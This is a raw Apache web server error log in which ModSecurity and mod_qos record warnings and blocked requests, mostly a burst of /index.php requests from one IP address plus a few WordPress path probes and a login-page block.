[Tue May 26 20:00:51.313339 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pcAAAAKc"]
[Tue May 26 20:00:51.321672 2026] [security2:error] [pid 112029:tid 112227] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8SAAAAU4"]
[Tue May 26 20:00:51.328742 2026] [security2:error] [pid 112029:tid 112263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8VAAAAXI"]
[Tue May 26 20:00:51.328848 2026] [security2:error] [pid 112029:tid 112211] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8XgAAAT4"]
[Tue May 26 20:00:51.330048 2026] [security2:error] [pid 112029:tid 112217] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8UAAAAUQ"]
[Tue May 26 20:00:51.331937 2026] [security2:error] [pid 112029:tid 112274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8VQAAAX0"]
[Tue May 26 20:00:51.339878 2026] [security2:error] [pid 112029:tid 112237] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8VgAAAVg"]
[Tue May 26 20:00:51.348941 2026] [security2:error] [pid 112029:tid 112197] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8XAAAATA"]
[Tue May 26 20:00:51.349865 2026] [security2:error] [pid 112029:tid 112268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8WwAAAXc"]
[Tue May 26 20:00:51.354889 2026] [security2:error] [pid 112029:tid 112277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8ZAAAAYA"]
[Tue May 26 20:00:51.377584 2026] [security2:error] [pid 112029:tid 112205] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8ZwAAATg"]
[Tue May 26 20:00:51.380856 2026] [security2:error] [pid 112029:tid 112226] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8iwAAAU0"]
[Tue May 26 20:00:51.388936 2026] [security2:error] [pid 112029:tid 112196] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8jgAAAS8"]
[Tue May 26 20:00:51.389697 2026] [security2:error] [pid 112029:tid 112189] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8jAAAASg"]
[Tue May 26 20:00:51.401863 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pgAAAANw"]
[Tue May 26 20:00:51.404335 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1pyQAAAQQ"]
[Tue May 26 20:00:51.410755 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1pywAAAPc"]
[Tue May 26 20:00:51.424390 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p5QAAANY"]
[Tue May 26 20:00:51.425474 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p2gAAAM8"]
[Tue May 26 20:00:51.428115 2026] [security2:error] [pid 112029:tid 112272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8lgAAAXs"]
[Tue May 26 20:00:51.435705 2026] [security2:error] [pid 112029:tid 112234] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8nQAAAVU"]
[Tue May 26 20:00:51.438264 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p8AAAALs"]
[Tue May 26 20:00:51.441984 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8kAAAATo"]
[Tue May 26 20:00:51.448441 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1pyAAAAOk"]
[Tue May 26 20:00:51.527443 2026] [security2:error] [pid 106517:tid 106719] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qQQAAAMk"]
[Tue May 26 20:00:51.686439 2026] [security2:error] [pid 106517:tid 106655] [client 103.163.220.18:55001] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentythree/patterns/"] [unique_id "ahWum4ZZc2DoU1lPnP1qfQAAAIo"]
[Tue May 26 20:00:51.734187 2026] [qos:error] [pid 112029:tid 112244] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWum6FW0C-ajaCsyFc88AAAAV8
[Tue May 26 20:00:51.734492 2026] [qos:error] [pid 106517:tid 106695] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qigAAALE
[Tue May 26 20:00:51.737461 2026] [qos:error] [pid 112029:tid 112200] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc88gAAATM
[Tue May 26 20:00:51.737909 2026] [qos:error] [pid 112029:tid 112276] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWum6FW0C-ajaCsyFc88wAAAX8
[Tue May 26 20:00:51.740427 2026] [qos:error] [pid 112029:tid 112265] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc89wAAAXQ
[Tue May 26 20:00:51.742317 2026] [qos:error] [pid 106517:tid 106775] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWum4ZZc2DoU1lPnP1qjQAAAQE
[Tue May 26 20:00:51.742518 2026] [qos:error] [pid 112029:tid 112236] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc8-AAAAVc
[Tue May 26 20:00:51.744205 2026] [qos:error] [pid 112029:tid 112256] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWum6FW0C-ajaCsyFc8-QAAAWs
[Tue May 26 20:00:51.746081 2026] [qos:error] [pid 112029:tid 112281] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWum6FW0C-ajaCsyFc8-gAAAYQ
[Tue May 26 20:00:51.785892 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qkAAAAMY
[Tue May 26 20:00:51.837430 2026] [security2:error] [pid 106517:tid 106632] [remote 144.126.139.83:58582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qlAAAlHA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:00:51.888665 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:46416] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qlQAAAK0
[Tue May 26 20:00:51.889222 2026] [qos:error] [pid 112029:tid 112272] [client 45.148.10.120:46492] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc8_wAAAXs
[Tue May 26 20:00:51.889341 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qlgAAANU
[Tue May 26 20:00:51.890103 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qlwAAAN8
[Tue May 26 20:00:51.894018 2026] [qos:error] [pid 112029:tid 112180] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc9AAAAAR8
[Tue May 26 20:00:51.894872 2026] [qos:error] [pid 112029:tid 112225] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc9AQAAAUw
[Tue May 26 20:00:51.896104 2026] [qos:error] [pid 112029:tid 112234] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum6FW0C-ajaCsyFc9AgAAAVU
[Tue May 26 20:00:51.900350 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qmAAAANE
[Tue May 26 20:00:51.902590 2026] [qos:error] [pid 106517:tid 106713] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qmQAAAMM
[Tue May 26 20:00:51.936183 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWum4ZZc2DoU1lPnP1qnAAAAOE
[Tue May 26 20:00:52.178180 2026] [security2:error] [pid 106517:tid 106768] [client 103.163.220.8:41615] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/themes.php"] [unique_id "ahWunIZZc2DoU1lPnP1qpwAAAPo"]
[Tue May 26 20:00:52.284390 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p6gAAAK4"]
[Tue May 26 20:00:52.296526 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qBwAAAPk"]
[Tue May 26 20:00:52.297871 2026] [security2:error] [pid 112029:tid 112233] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8lQAAAVQ"]
[Tue May 26 20:00:52.298259 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1pxQAAALA"]
[Tue May 26 20:00:52.299215 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p0QAAALQ"]
[Tue May 26 20:00:52.311606 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p6wAAAIs"]
[Tue May 26 20:00:52.316562 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p_gAAAJ0"]
[Tue May 26 20:00:52.317427 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qCwAAAN4"]
[Tue May 26 20:00:52.319808 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qAQAAAJ4"]
[Tue May 26 20:00:52.323544 2026] [security2:error] [pid 112029:tid 112181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8kwAAASA"]
[Tue May 26 20:00:52.324490 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qAwAAALI"]
[Tue May 26 20:00:52.327359 2026] [security2:error] [pid 112029:tid 112212] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumqFW0C-ajaCsyFc8owAAAT8"]
[Tue May 26 20:00:52.327863 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1p7AAAAPM"]
[Tue May 26 20:00:52.344713 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qDwAAAIY"]
[Tue May 26 20:00:52.347182 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qFAAAANc"]
[Tue May 26 20:00:52.369132 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qEAAAAJE"]
[Tue May 26 20:00:52.377444 2026] [security2:error] [pid 112029:tid 112273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8wwAAAXw"]
[Tue May 26 20:00:52.378275 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qCAAAAMA"]
[Tue May 26 20:00:52.384427 2026] [security2:error] [pid 112029:tid 112178] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8zAAAAR0"]
[Tue May 26 20:00:52.393615 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qbgAAAJ8"]
[Tue May 26 20:00:52.405079 2026] [security2:error] [pid 112029:tid 112227] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc81gAAAU4"]
[Tue May 26 20:00:52.405834 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumoZZc2DoU1lPnP1qAAAAAO4"]
[Tue May 26 20:00:52.405931 2026] [security2:error] [pid 112029:tid 112172] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc80QAAARc"]
[Tue May 26 20:00:52.414485 2026] [security2:error] [pid 112029:tid 112202] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8zwAAATU"]
[Tue May 26 20:00:52.420712 2026] [security2:error] [pid 112029:tid 112185] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc80wAAASQ"]
[Tue May 26 20:00:52.424765 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum4ZZc2DoU1lPnP1qbAAAAP8"]
[Tue May 26 20:00:52.425098 2026] [security2:error] [pid 112029:tid 112266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8wgAAAXU"]
[Tue May 26 20:00:52.428233 2026] [security2:error] [pid 112029:tid 112252] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc8xAAAAWc"]
[Tue May 26 20:00:52.430560 2026] [security2:error] [pid 112029:tid 112171] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc81AAAARY"]
[Tue May 26 20:00:52.437981 2026] [security2:error] [pid 112029:tid 112166] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc82QAAARE"]
[Tue May 26 20:00:52.440859 2026] [security2:error] [pid 112029:tid 112264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWum6FW0C-ajaCsyFc81QAAAXM"]
